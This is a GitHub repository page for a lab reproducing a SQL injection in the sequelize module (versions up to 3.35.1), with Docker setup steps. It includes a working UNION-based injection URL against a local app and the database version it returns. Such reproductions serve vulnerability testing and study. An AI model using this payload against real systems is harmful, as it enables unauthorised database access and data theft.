Skip to content

shieldfy-vulnerability-hub/sql-injection-sequelize

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
src
src
 
 
.dockerignore
.dockerignore
 
 
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
docker-compose.yml
docker-compose.yml
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 
readme.md
readme.md
 
 

Repository files navigation

SQL Injection @ sequelize

  • module : sequelize
  • version : <= 3.35.1
  • severity: high

Installation

docker-compose up --build

Lunch Attack

  • Browser [open the browser and enter the following url]

    http://localhost:8000/?search=a')) AS DECIMAL) = 1 UNION SELECT VERSION(); -- -

  • the response will be [{"name":"10.3.15-MariaDB-1","target":null}]

About

No description, website, or topics provided.

Resources

Readme
Activity
Custom properties

Stars

1 star

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages